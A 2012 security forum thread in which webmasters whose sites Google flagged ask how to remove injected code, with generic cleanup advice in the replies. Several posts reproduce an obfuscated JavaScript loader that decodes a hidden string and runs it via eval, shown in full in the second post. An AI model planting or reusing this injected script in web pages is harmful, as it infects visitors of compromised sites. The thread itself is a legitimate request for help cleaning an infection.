1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Malware on the site as per google but I cannot find it

Discussion in 'Security' started by Matt18, May 30, 2012.

  1. #1
    Hi

    yesterday when I came to one of my sites I got a warning from google that there is malware on my site. I looked at the code and there was indeed some javascript that shouldn't be there. I googled it and didn't find anything usefull. When I came back to my site, that code was gone, but google (when accessing the site from the search engine) and google chrome still give me a warning that there is malware on my site.

    I looked at webmaster tools and they have identified few pages as problematic. One of them is http://www.keramikfliesen.com/schweiz/rimini/. The code that is listed in the webmaster tools under Malware is:

    <script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
    rxnl";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
    %8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]
    &+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?
    ^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]
    &*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
    &*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!
    ^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
    $@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$@
    $$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+$_!$&*!|&)
    &<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
    $)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$@$$$~!+
    &~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
    !*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
    &&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
    $:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@
    !$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$$|&&^]
    &+&~
    Code (markup):

    Can you please help me out? How should I fight this?

    Thank you all very much for your help in advance!
    SEMrush
     
    Matt18, May 30, 2012 IP
    SEMrush
  2. Matt18

    Matt18 Guest

    Messages:
    591
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #2
    Update: Code appeared again, but then dissapeared right away.

    here is the full code:

    <script type='text/javascript'>st="en0no3nno3mpno3rxthuissno3rvno3rpno3rxcom";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$@$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+$_!$&*!|&)&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$@$$$~!+&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$$|&&^]&+&~&^!*&]&*&_!+$)&:^]!!&:&_&+&~!!$)&!^]!+&?&:!^^@!+!$!:!@!&*!^]$$&!&*!+!^&*!++<!+!+!$&:!^&+&&$$^@!&&<!$$|&<^]*@*]^@&+!)!)$?&*^]$$^|$$$:^@&<$_!|!*!^&?$?$$&?&*&:&!&?!+$$$)$$!^!*&$!^!+!$&:&_&!$$$)$$!+!$&*&^!$&*&<!+&*+*&)&*&]&*&_!+&!&*!+$$$)$$!!&:&+!+&?$$$)$|$$!&&$&]&:&&!$!^&*!+$$$)!&*!$)$$&$&~&+!:$$$)$$&<!|!|&*&_&++^&?&:&)&+$$$)&*$)&&$)$$!^!$&^$$$:^@!&&<!$$|&#^]&<*@^$*]*@&<*@^<*]*]$?^^$)^<^&$:^@!&+@^]&<*@^+*]*@&<*@^<*]*]$?^^$)^&$:$@$$&<&]&*$$^@!|^]&<*@^**]*@&<*@^<*]*]$?^^$)^<^<$:$@$$&$!*!+&*$$^@!&&<!$$|&@^]&!$_&$$?$:$)&$^]&<*@^:*]*@&#*]$?!&+@$:^@&$*@&<*@^<^|*]*]^]&@^@&$*@&<*@^^*]*]^]&<*@^?*]^@&$*@&<*@^|*]*]^]&<*@^?*]^@&<*@^:*]*@&<*@^&*]*]*@&<*@^!*]*]$?&$$:!]&^&<!+&^&?$?&]$:!@&&$_!!!$&:!+&*$?$$^)&?!+&]&)^_^)&$&~&+!:^_^)$~&$&~&+!:^_^)$~&?!+&]&)^_$$$:$)&:$_!^&*!+*+&:&]&*&~!*!+$?&&!*&_&^!+&:&~&_$?$:!@&!$_&<$?$:!]$)^$^^^^$:!]!]!]^@!&&<!$$|&)^]&_&*!!$|&?^@&:&&$?!!&:&_&+&~!!$_&_&<!&&:&!&<!+&~!$$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&]&<!+&^&?$?$~&&&:!$&*&&&~!?!)&]!^&:&*$~&:$:$:!@&)$_&<$?$:^@!]$|&*&)!^&*$|!@$|&+&~&^!*&]&*&_!+$_&~&_&]&~!*!^&*&]&~!&&*^]&&!*&_&^!+&:&~&_$?$:!@&)$_&<$?$:^@&+&~&^!*&]&*&_!+$_&~&_&]&~!*!^&*&]&~!&&*^]&_!*&)&)!]!]!]^@"; function e(){e=a.join("$").split("%");for(var d in e)"string"==typeof e[d]&&(c=c.split(e[d].substr(1)).join(e[d].substr(0,1)));return this}var f=e(),a="";for(_E=~b-~b;_E<c.length/2;_E++)a+="%"+c.substr(2*_E,2);window.eval(f.decodeURIComponent(a));</script>
    Code (markup):
    How should I start fighting this? I have no idea where it's coming from and it goes away upon refresh :S
     
    Matt18, May 30, 2012 IP
  3. Alexbizz

    Alexbizz Active Member

    Messages:
    197
    Likes Received:
    12
    Best Answers:
    0
    Trophy Points:
    60
    #3
    Did you scanned your host via Cpanel scanner?
    Maybe you have backdoor on your site?
    Check your site with Stopthehacker.com there is free subscription i think.
     
    Alexbizz, May 30, 2012 IP
  4. coolrohit222002

    coolrohit222002 Well-Known Member

    Messages:
    504
    Likes Received:
    13
    Best Answers:
    3
    Trophy Points:
    140
    #4
    Maybe this is an iframe or a php.ini virus embedded inside your server.
    Maybe i can help you on fixing that. It happen on my site before.
     
    coolrohit222002, May 30, 2012 IP
  5. pianopro11

    pianopro11 Member

    Messages:
    111
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    38
    #5
    Have the exact same thing happen to me. Webmaster tools notified me, and i've literally spent two days trying to find this thing. PLEASE let me know if you can find anything.

    My code: <script type='text/javascript'>st="en0no3nno3mpno3rxthuissno
    3rvno3rpno3rxcom";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2
    ","%7!%0|%f~%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:
    &&$?$]^<^]^]&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?
    &!^<$:$:!@!?^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_
    !^&*!+*+&:&]&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<
    !+&*$?&^$_&!&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~
    &~&@&:&*^]&!^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$
    &:&_&!$?$:$:$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$
    &:&_&!$?$:$@$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^
    !+$_!$&*!|&)&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?
    $~&_&~^^$~&!$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_
    $$$:$@$$$~!+&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:
    &!&<!+&~!$$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_
    &:&_&+&*!?+~&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_
    &^!+&:&~&_$?$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+
    &:&~&_$?$:!@!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@
    !&&<
     
    Last edited: Jun 1, 2012
    pianopro11, Jun 1, 2012 IP
  6. linux7802

    linux7802 Active Member

    Messages:
    110
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    53
    #6
    Your host can only restore the account from the backup or remove the code from the files, for permanent fix download the hosting account content on the local machine and scan it with the local machine antivirus and remove the infected files from hosting account and re-upload the content on the server.

    Now upgrade the script as well as plugin/module hosted under your hosting account to latest secured patch and if possible remove the unused plugin/module , files,ftp accounts from the hosting account and make sure that files having 644 and directory having 755 permission, do not set the 777 full permission and nobody ownership to any file or directory as it allow hacker to upload the hacking script and inject to your hosting content like currently you are facing the problem.

    By using the above steps, your hosting account is secure but if still you are facing the problem then change the server or host because many time on shared server other compromised hosting account cause such problem.
     
    linux7802, Jun 2, 2012 IP
  7. 04rubin

    04rubin Peon

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #7
    you can try and use Kyplex
     
    04rubin, Jun 4, 2012 IP
  8. laithbarnouti

    laithbarnouti Peon

    Messages:
    17
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #8
    i found some info here, but not enough any one else tell me?
     
    laithbarnouti, Aug 30, 2012 IP